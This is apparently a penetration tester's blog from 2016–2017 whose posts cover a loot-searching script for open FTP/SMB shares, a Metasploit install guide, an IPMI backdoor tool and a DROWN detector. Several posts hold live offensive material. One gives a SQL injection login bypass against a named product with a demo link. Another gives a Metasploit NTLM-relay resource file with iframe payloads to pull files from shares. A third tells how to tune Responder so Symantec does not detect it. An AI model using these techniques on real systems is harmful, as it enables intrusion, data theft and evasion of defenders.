## Wednesday, July 12, 2017

### Introducing Booty Quest!

Booty Quest [BQ] is a little bash script I made to aid in my pen testing activities. While running a pen test I often find a large number of anonymous FTP servers, unsecured SMB shares, so on and due to resource restrictions I can't dive any deeper. While these are findings in their own right, it leaves a lot on the bone in my opinion. Finding these services are also hosting sensitive information could turn a medium finding into high or critical depending on the scale you use.

I have seen countless third parties "pen-test vendors" do the same and pass over looking at the data that is being exposed by the service. There are some tools out there with functions that are somewhat similar but nothing that does all the heavy lifting of making connections and managing the data like BQ.

So basically you find a anonymous FTP or SMB server, then you just plug in the IP of the host and in the case of SMB the share path. BQ will download all the files on the FTP server or mount the SMB share and then use grep and regex to locate IPs, emails, CC#s, SS#s, Phone #s, IBAN, usernames, and passwords. If it finds text files and images it will copy them to another location so you can sift over them later.

Basic setup:
After you download the script run:
chmod a+x bq.sh

Here is the basic help:
root@system:~/sec# ./bq.sh
#######################
# [B]ooty [Q]uest                #
# By Adam Espitia               #
# aahideaway.blogspot.com #
# Arr, matey,                       #
#  where be me booty!        #
#######################

This script will mount/download contact from a remote host and search it for sensitive information.

Usage here
./bq.sh nfs 192.168.1.1 /share/here/
./bq.sh smb 192.168.1.1 /share/here/
./bq.sh ftp 192.168.1.1
./bq.sh http 192.168.1.1 /dir/path/
./bq.sh local /dir/path/

## Friday, June 30, 2017

### Installing Metasploit on Debian 9 server

So I recently installed Metasploit on Debian 9, heres how:

apt-get install default-jre default-jdk software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - ) rvm install$RUBYVERSION
rvm use $RUBYVERSION --default cd ~ git clone git://github.com/sstephenson/rbenv.git .rbenv git clone git://github.com/sstephenson/rbenv.git .rbenv echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo exec$SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - ) rbenv install$RUBYVERSION
rbenv global $RUBYVERSION mkdir ~/dev cd ~/dev git clone https://github.com/nmap/nmap.git ./configure make make install make clean su postgres createuser msf -P -S -R -D createdb -O msf msf psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';" exit cd /opt/ git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework/ rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/\$MSF;done'
nano /opt/metasploit-framework/config/database.yml
datebase.yml contents
production:
adapter: postgresql
database: msf
username: msf
password: blah
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
More cmds...
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...

Yeah that sucked, but it works!

## Tuesday, January 3, 2017

### My Click Counter 1.0 admin login bypass via SQLi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to scripts admin login page and submit ' or ''=' for username and password
and it should give you access to the admin area. Enjoy >:)

Demo: http://software.friendsinwar.com/scripts_example/my_click_counter/login.php

## Sunday, July 24, 2016

### Trying to automate the downloading of all files in a share using metasploit's http_ntlmrelay module with little recon.

Sorry for the long title. So I have been trying to automate the downloading of all files on a share using metasploit's http_ntlmrelay module. Here is the secinaro, you are on a network with file share servers that host employee's windows documents folder and authenticate using ntlm. Active Directory has anonymous read access, which you can use to find the address to the file server and path the user has access to. Assuming you have only one shot to get the loot I first use RTYPE SMB_LS, then use a sync file to parse the data and download the first file found using SMB_GET. I used a resource file to tie it all together, here is the code I used below.

resource.rb
use auxiliary/server/http_ntlmrelay
unset all
notes -d
set RHOST
set RPORT 445
set RTYPE SMB_LS
set RURIPATH
set URIPATH test1
run
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run

syncfile.rb
print_status("looking for data...")
framework.db.notes.each do |note|
if (note.ntype == 'ntlm_relay')
for app in note.data[:Response]
p1 = app[1].to_s.split(",")
if (p1[0] == '{"type"=>"F"')
datastore['RURIPATH']=note.data[:RURI]+app[0]
end
end
end
puts(datastore['RURIPATH'])
end

payload.html
[iframe src="http://kali:8080/test1"]
[iframe src="http://kali:8080/test2"]

The issues I'm having are, this method can only download one file at the moment and if the share's path goes deeper then one directory (i.e. path\to\share\) test1 does not authenticate properly and the attack fails. I have just started messing with the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out, if you have a solution please let me know! Thank you and enjoy.

## Tuesday, May 17, 2016

### Bypassing Symantec Endpoint SMB NTLM capture attack detection

A while back I was running Responder on a network to get some hashes. To my surprise, the incident response team pinged me and asked if alerts they were getting from Symantec Endpoint Security [SEP] was from my activities. I social engineered them a little and they ended up sending me a screen cap. The screen cap they sent me said:
Attack: SMB Sniffer Negotiate Protocol Challenge Key 2
Now when I googled that it returned a page which gives a bit more information.
URL: https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26956

On that page it says:
This signature detects attempts to sniff SMB usernames and passwords through a known challenge key which can then be used to crack the passwords offline.
The key words there are "through a known challenge key". Responder uses the default challenge key of 1122334455667788 and that is how SEP detected this attack. Responder is awesome and has a config file that allows you to change the challenge key to what ever you want, which then bypasses SEP detection of the attack. The config file is found in /usr/share/responder/ on kali 2 systems, simply change the challenge key to something like 2211334455667788 and your attacks will go unnoticed by SEP. Happy hacking :)

## Saturday, March 12, 2016

### IPMIPWN Tool

There are a few good tools out there (Metasploit) to help you find and identify the IPMI cipher 0 vulnerability, but because its relatively trivial to exploit I have seen nothing that helps you pwn it. While it is easy to exploit, I have found I keep having to brush up on commands and junk every time I come across it which is where my tools comes in.

My IPMIPWN tool does all the real work for you, it will attempt to exploit the cipher 0 vulnerability using a list of predefined default user accounts and setup a backdoor account with a semi-random username and random password. All successful backdoors are logged in loot.log. This tool works best on Kali, it does require you to have ipmiutils "apt-get install ipmitool" and NMAP installed. Enjoy.

Get IPMIPWN from GitHub

## Thursday, March 3, 2016

### My Own DROWN Detection Tool

I had to find a quick way to detect the DROWN vulnerability on a large enterprise level network, so this goes more into the vulnerability management realm, but I was tasked with it none the less and I thought others might get some use from my work here as well.

I didn't like the scanning tool from drownattack.com and most of the systems in scope were internal so I couldn't use their online version either. First I tried OpenSSL but the version that comes with Kali 2 does not support SSLv2 even thought the help menu says it does. I was going to try and recompile OpenSSL to add SSLv2 support but that was proving to be a pain in the ass.

That's when I made a little bash script that uses NMAP and TestSSLServer to detect SSLv2 support on port 443 of a web server. All you need to do is provide a list of IPs and it goes to work, unlike all the other tools available at the moment, the output is clear and easy to understand. It does lack features and support for other ports. If the tool proves popular I will be happy to add both. Enjoy and happy hacking :)

Get the DROWN Detection Tool from GitHub.

**UPDATE: Thanks to ngharo for the code contribution. Already merged your changes into master!